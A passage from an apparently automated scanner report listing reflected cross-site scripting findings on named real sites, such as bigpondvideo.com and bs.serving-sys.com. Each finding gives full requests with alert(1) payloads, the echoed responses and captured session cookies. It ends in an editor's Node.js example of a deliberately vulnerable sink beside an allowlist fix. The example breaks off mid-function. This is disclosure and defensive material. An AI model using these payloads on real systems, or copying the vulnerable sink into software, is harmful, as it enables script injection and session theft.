Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
o/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb305140959&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-MusicTVa042b</script><script>alert(1)</script>3171aedcdae&channelId=101&channelTitle=musictv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.509. http://bigpondvideo.com/newstv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /newstv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1aecf</script><script>alert(1)</script>2fcfa8ae8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newstv/?1aecf</script><script>alert(1)</script>2fcfa8ae8f1=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:51 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5e0bafb1ce82541845e1ddc941d367b0; path=/
Content-Type: text/html
Connection: close
Content-Length: 58312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b9335153&platform=Production&phpSessionId=5e0bafb1ce82541845e1ddc941d367b0&1aecf</script><script>alert(1)</script>2fcfa8ae8f1=1&channelId=106&channelTitle=newstv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.510. http://bigpondvideo.com/newstv/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /newstv/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bd11</script><script>alert(1)</script>4928acb5bca was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newstv/?ref=Net-Head-TV-NewsTV4bd11</script><script>alert(1)</script>4928acb5bca HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:07:54 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb300a1e078&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-NewsTV4bd11</script><script>alert(1)</script>4928acb5bca&channelId=106&channelTitle=newstv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.511. http://bigpondvideo.com/racingtv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /racingtv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 519fd</script><script>alert(1)</script>c34c16aedfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /racingtv/?519fd</script><script>alert(1)</script>c34c16aedfb=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:33 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3031b6bdc&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&519fd</script><script>alert(1)</script>c34c16aedfb=1&channelId=105&channelTitle=racingtv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.512. http://bigpondvideo.com/racingtv/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /racingtv/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e27dc</script><script>alert(1)</script>1c3586a0fb8 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /racingtv/?ref=Net-Head-TV-Sport-Racinge27dc</script><script>alert(1)</script>1c3586a0fb8 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:22 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
flashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb302698305&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-Racinge27dc</script><script>alert(1)</script>1c3586a0fb8&channelId=105&channelTitle=racingtv&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.513. http://bigpondvideo.com/surfing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /surfing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ade</script><script>alert(1)</script>6d3d9e41987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surfing/?c8ade</script><script>alert(1)</script>6d3d9e41987=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:42 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303a0eebb&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&c8ade</script><script>alert(1)</script>6d3d9e41987=1&navId=775&channelTitle=Surfing&targetLevel=Videos.Sport.Surfing.All Surfing&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.514. http://bigpondvideo.com/surfing/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /surfing/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c38</script><script>alert(1)</script>addf8fba4dc was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /surfing/?ref=Net-Head-TV-Sport-Surf15c38</script><script>alert(1)</script>addf8fba4dc HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:36 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
etflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30351a597&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-Surf15c38</script><script>alert(1)</script>addf8fba4dc&navId=775&channelTitle=Surfing&targetLevel=Videos.Sport.Surfing.All Surfing&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.515. http://bigpondvideo.com/v8/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /v8/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edabd</script><script>alert(1)</script>12df95b1764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v8/?edabd</script><script>alert(1)</script>12df95b1764=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:40 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303866a75&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&edabd</script><script>alert(1)</script>12df95b1764=1&navId=143&channelTitle=V8Supercars&targetLevel=Videos.Sport.V8Supercars&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.516. http://bigpondvideo.com/v8/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /v8/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 721fa</script><script>alert(1)</script>8151d9e734e was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v8/?ref=Net-Head-TV-Sport-V8s721fa</script><script>alert(1)</script>8151d9e734e HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:40 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb303821fcf&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-V8s721fa</script><script>alert(1)</script>8151d9e734e&navId=143&channelTitle=V8Supercars&targetLevel=Videos.Sport.V8Supercars&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.517. http://blog.utest.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.utest.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c12f5"><script>alert(1)</script>8dbfb50b0c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c12f5\\\"><script>alert(1)</script>8dbfb50b0c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c12f5"><script>alert(1)</script>8dbfb50b0c1=1 HTTP/1.1
Host: blog.utest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:27:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
X-Pingback: http://blog.utest.com/xmlrpc.php
Set-Cookie: mkeng_id=156b53d184ba4daf55943195c5d3c6e02012fd91; expires=Thu, 01-Jan-2015 03:27:42 GMT; path=/; domain=.utest.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80898

<!--mclude mevisit.php-->
<!--/mclude-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<a href="http://blog.utest.com/?c12f5\\\"><script>alert(1)</script>8dbfb50b0c1=1">
...[SNIP]...

2.518. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npui parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the npui request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 47ee7%3balert(1)//f80d364f94 was submitted in the npui parameter. This input was echoed as 47ee7;alert(1)//f80d364f94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1899719&PluID=0&w=300&h=250&ord=892455851294&ncu=$$http://media.sensis.com.au/ADCLICK/CID=000335eea5822e9500000000/acc_random=892455851294/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x250/POSITION=ABV1/pageid=942103891691/relocate=$$&npui=147ee7%3balert(1)//f80d364f94&z=0 HTTP/1.1
Accept: */*
Referer: http://ad.sensismediasmart.com.au/images/sensis/cookieFix.html?acc_random=892455851294/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x250/POSITION=ABV1/pageid=942103891691
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: u2=215df6f9-1fe3-49f0-b23f-653a85ec55703Fi05g; u3=1; A2=e1YR9PCh08te0000820wrVfi5g9PI009KD0000g410rVfke59PAA0a4c0000820wrVfn7U9PD10a4c0000820wrVfpR89PH607SK0000820wrVdsi99Qa204uw0000820wrWfi5E9PHW09KD0000g410rVe1YT9PCL08te0000820wrVeWk69PCs02WG0000820wrVfn3s9PAD0a4c0000w820rVfn6n9PD10a4c0000820wrVfjML9PHa07jX0000g410rVfdwO9Pzt08LR0000820wrVec1T9PBl08+l0000820wrVf5JE9PCF02WG0000820wrVfjMp9PHJ07jX0000820wrVebZj9PFv0aTn0000820wrVfjMB9PFV07jX0000820wrVeNDU9PzW08te0000820wrVe1YX9PzK08te0000820wrVeLE09PBO02WG0000820wrVeNDV9PD108te0000820wrVeEnE9Pc80a3s0000820wrUe1YZ9PA408te0000820wrVeWj59Pzu02WG0000820wrVcECb9PbR09AI0000820wrTfi5f9PHT09KD0000820wrV; B2=67xl0820wrW7z2G0820wrV7vDU0820wrV6V2t0820wrV7dNC0820wrV7vEX0820wrV7vE40g410rV6V2v0820wrV7dNE0820wrV6RTh0820wrV7dPJ0g410rV7hJy0820wrV6Tx50820wrV71re0820wrU7hJz0820wrV7hJA0Ea2wrV6V2z0820wrV7eEn0820wrV6Tvq0820wrV7eEo0820wrV6V2B0820wrV7vJ60g410rV6kvf0820wrT7vJ80o61wrV; C3=0uP4w820rV000000w_0szL820wrV00000g0_0rCe820wrW0000001_0lt1820wrV0000040_0tyS820wrV0000200_0s0g820wrT0000010_0vlaEa2wrV0000010_0tUdMc30rV0000008_0vvc820wrV0000004_0vmDw820rV000000a_0uhx820wrU0000002_0uXiMc30rV0000001_; D3=0vmD03ZEo61wrV0tUd00HsMc30rV0s0g0232820wrT0vmD000I820wrV0uP405qlw820rV0uhx00iH820wrU0lt1001N820wrV0vvc05SD820wrV0uXi03QkMc30rV0rCe03sH820wrW0szL001w820wrV0vla000IEa2wrV0tyS02cp820wrV; E2=07jXw820rV09KDEa2wrV08+l820wrV0aTn820wrV08teMc30rV0a4cMc30rV02WGw820rV08LR820wrV0a3s820wrU09AI820wrT04uw820wrW07SK820wrV; F1=00UilH0003sY9PGI; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=...[SNIP]...; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7z2G0820wrV67xl0820wrW7dNC0820wrV6V2t0820wrV7vDU0820wrV7vE40g410rV7vEX0820wrV7dNE0820wrV6V2v0820wrV7dPJ0g410rV6RTh0820wrV7hJy0820wrV7hJz0820wrV71re0820wrU6Tx50820wrV7fP70820wrW6V2z0820wrV7hJA0Ea2wrV7eEn0820wrV6V2B0820wrV7eEo0820wrV6Tvq0820wrV7vJ60g410rV6kvf0820wrT7vJ80o61wrV; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4w820rV000000w_0szL820wrV00000g0_0lt1820wrV0000040_0rCe820wrW0000001_0tyS820wrV0000200_0s0g820wrT0000010_0uSU820wrW0000008_0vlaEa2wrV0000010_0tUdMc30rV0000008_0vvc820wrV0000004_0uXiMc30rV0000001_0uhx820wrU0000002_0vmDw820rV000000a_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0vmD03ZEo61wrV0s0g0232820wrT0tUd00HsMc30rV0uP405qlw820rV0vmD000I820wrV0uSU00m+820wrW0uhx00iH820wrU0vvc05SD820wrV0lt1001N820wrV0uXi03QkMc30rV0szL001w820wrV0rCe03sH820wrW0vla000IEa2wrV0tyS02cp820wrV; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09KDEa2wrV07jXw820rV08+l820wrV0aTn820wrV03ai820wrW08teMc30rV02WGw820rV0a4cMc30rV0a3s820wrU08LR820wrV09AI820wrT07SK820wrV04uw820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=215df6f9-1fe3-49f0-b23f-653a85ec55703Fi05g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=215df6f9-1fe3-49f0-b23f-653a85ec55703Fi05g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1986

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
.replace(/\[ebRandom\]/ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,3923131).replace(/\[%tp_flightid%\]/ig,1899719).replace(/\[%tp_campaignid%\]/ig,126392);}var strNPU="";if(147ee7;alert(1)//f80d364f94==1)strNPU=ebTokens(gEbBAd.playRS.strNUrl);document.write("<IMG SRC="+strNPU+" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...
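
Finding 2.518 differs from the string-context findings around it: the npui value lands in `if(...==1)` with no delimiter at all, so there is no character to escape and output encoding cannot help. The Node.js example below is added by the editor; it is not code from the report or from the ad server. The builder functions are hypothetical stand-ins for the template that produced the response fragment, and the only input is the payload copied from the report, used here as a constructed test value. It contrasts the reflected expression with a strict allowlist parse, and generalises the same idea to a parameter that may be any integer.

```javascript
// Added example (not from the original report): an unquoted JavaScript
// expression sink, modelled on the adServer.bs fragment in finding 2.518:
//   if(147ee7;alert(1)//f80d364f94==1)strNPU=ebTokens(...)
// Nothing delimits the parameter from the surrounding code, so the fix is
// to accept only the values the code expects and emit the parsed value.

// Constructed input: the npui value as it was reflected in the report.
const PAYLOAD = '147ee7;alert(1)//f80d364f94';

// Vulnerable: reproduces the observed behaviour, raw value in the expression.
function npuCheckVulnerable(npui) {
  return 'if(' + npui + '==1)strNPU=ebTokens(gEbBAd.playRS.strNUrl);';
}

// The parameter is a flag, so only the strings "0" and "1" are acceptable.
// Rejecting everything else is the right response; stripping "bad"
// characters instead would just invite the next bypass.
function parseFlag(raw) {
  if (raw !== '0' && raw !== '1') {
    throw new RangeError('npui must be 0 or 1, got ' + JSON.stringify(raw));
  }
  return Number(raw);
}

// Safe: what reaches the template is a Number produced by parseFlag,
// never the request string.
function npuCheckSafe(npui) {
  const flag = parseFlag(npui);
  return 'if(' + flag + '==1)strNPU=ebTokens(gEbBAd.playRS.strNUrl);';
}

// Generalisation for a parameter that may be any (bounded) integer: a
// strict syntactic check, then emit the canonical form of the parsed
// Number. "1e3", "0x10", leading spaces and empty strings are all rejected
// even though Number() would happily coerce some of them.
function emitInteger(raw) {
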